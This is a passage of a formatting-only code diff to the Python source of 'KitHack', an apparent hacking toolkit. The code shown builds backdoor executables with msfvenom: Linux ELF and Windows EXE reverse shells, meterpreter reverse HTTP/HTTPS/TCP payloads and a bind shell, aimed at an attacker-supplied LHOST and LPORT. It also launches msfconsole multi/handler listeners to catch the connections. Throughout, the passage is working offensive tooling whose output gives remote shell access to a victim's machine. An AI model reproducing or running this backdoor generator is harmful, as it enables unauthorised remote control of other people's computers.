stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '06': + elif pay == "06": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p linux/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p linux/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + if os.stat("output/{}.elf".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/shell_reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/shell_reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '07': + elif pay == "07": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_http LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_http LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + if os.stat("output/{}.elf".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_http; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_http; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_http; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '08': + elif pay == "08": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_https LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_https LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + if os.stat("output/{}.elf".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_https; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_https; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_https; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '09': + elif pay == "09": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + if os.stat("output/{}.elf".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_tcp; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '10': + elif pay == "10": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + if os.stat("output/{}.elf".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter/reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter/reverse_tcp; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter/reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '11': + elif pay == "11": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p linux/x86/shell_bind_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p linux/x86/shell_bind_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + if os.stat("output/{}.elf".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/shell_bind_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/shell_bind_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/shell_bind_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/shell_bind_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '12': + elif pay == "12": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p linux/x86/shell_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p linux/x86/shell_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + if os.stat("output/{}.elf".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/shell_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/shell_reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/shell_reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() - elif sys == '02': - print('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print( - '{0}[01]{1} windows/x64/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print( - '{0}[02]{1} windows/x64/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print( - '{0}[03]{1} windows/x64/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) + elif sys == "02": + print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) print( - '{0}[04]{1} windows/x64/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) + "{0}[01]{1} windows/x64/meterpreter_reverse_http".format(WHITE, YELLOW) + ) print( - '{0}[05]{1} windows/x64/powershell_reverse_tcp'.format(WHITE, YELLOW)) - print('{0}[06]{1} windows/x64/shell_reverse_tcp'.format(WHITE, YELLOW)) + "{0}[02]{1} windows/x64/meterpreter_reverse_https".format(WHITE, YELLOW) + ) print( - '{0}[07]{1} windows/meterpreter_reverse_http'.format(WHITE, YELLOW)) + "{0}[03]{1} windows/x64/meterpreter_reverse_tcp".format(WHITE, YELLOW) + ) print( - '{0}[08]{1} windows/meterpreter_reverse_https'.format(WHITE, YELLOW)) + "{0}[04]{1} windows/x64/meterpreter/reverse_tcp".format(WHITE, YELLOW) + ) + print("{0}[05]{1} windows/x64/powershell_reverse_tcp".format(WHITE, YELLOW)) + print("{0}[06]{1} windows/x64/shell_reverse_tcp".format(WHITE, YELLOW)) + print("{0}[07]{1} windows/meterpreter_reverse_http".format(WHITE, YELLOW)) + print("{0}[08]{1} windows/meterpreter_reverse_https".format(WHITE, YELLOW)) + print("{0}[09]{1} windows/meterpreter_reverse_tcp".format(WHITE, YELLOW)) + print("{0}[10]{1} windows/meterpreter/reverse_tcp".format(WHITE, YELLOW)) print( - '{0}[09]{1} windows/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print( - '{0}[10]{1} windows/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print( - '{0}[11]{1} windows/meterpreter/reverse_tcp_dns'.format(WHITE, YELLOW)) - print('{0}[12]{1} windows/metsvc_reverse_tcp'.format(WHITE, YELLOW)) - print('{0}[13]{1} windows/powershell_reverse_tcp'.format(WHITE, YELLOW)) - print('{0}[14]{1} windows/shell_reverse_tcp'.format(WHITE, YELLOW)) + "{0}[11]{1} windows/meterpreter/reverse_tcp_dns".format(WHITE, YELLOW) + ) + print("{0}[12]{1} windows/metsvc_reverse_tcp".format(WHITE, YELLOW)) + print("{0}[13]{1} windows/powershell_reverse_tcp".format(WHITE, YELLOW)) + print("{0}[14]{1} windows/shell_reverse_tcp".format(WHITE, YELLOW)) pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) pay = pay.zfill(2) - if pay == '01': + if pay == "01": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + if os.stat("output/{}.exe".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_http; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_http; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_http; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '02': + elif pay == "02": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - 